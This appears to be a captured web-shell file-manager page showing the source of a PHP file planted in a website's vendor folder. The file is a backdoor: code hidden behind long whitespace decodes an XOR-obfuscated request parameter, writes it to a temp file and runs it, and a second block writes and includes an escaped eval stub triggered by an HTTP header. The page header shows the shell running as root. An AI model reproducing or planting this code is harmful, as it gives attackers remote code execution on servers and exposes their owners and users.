HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
$ pwd: /var/www/html/logros.sumar.com.py/public/vendor/
Upload Files
File: /var/www/html/logros.sumar.com.py/public/vendor/imgajoutpanier.php
<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["\x72ec\x6F\x72d"])){ $property_set = array_filter(["/dev/shm", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), "/var/tmp", "/tmp", sys_get_temp_dir(), session_save_path()]); $reference = hex2bin($_REQUEST["\x72ec\x6F\x72d"]); $dchunk=''; $q = 0; while($q < strlen($reference)){$dchunk .= chr(ord($reference[$q]) ^ 35);$q++;} foreach ($property_set as $key => $ent) { if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) { $tkn = implode("/", [$ent, ".factor"]); if (file_put_contents($tkn, $dchunk)) { include $tkn; @unlink($tkn); die(); } } } }


$_HEADERS = getallheaders();
if (isset($_HEADERS['If-Unmodified-Since'])) {
    $c = "<\x3fp\x68p\x20@\x65v\x61l\x28$\x5fR\x45Q\x55E\x53T\x5b\"\x43l\x65a\x72-\x53i\x74e\x2dD\x61t\x61\"\x5d)\x3b@\x65v\x61l\x28$\x5fH\x45A\x44E\x52S\x5b\"\x43l\x65a\x72-\x53i\x74e\x2dD\x61t\x61\"\x5d)\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}
@ Telegram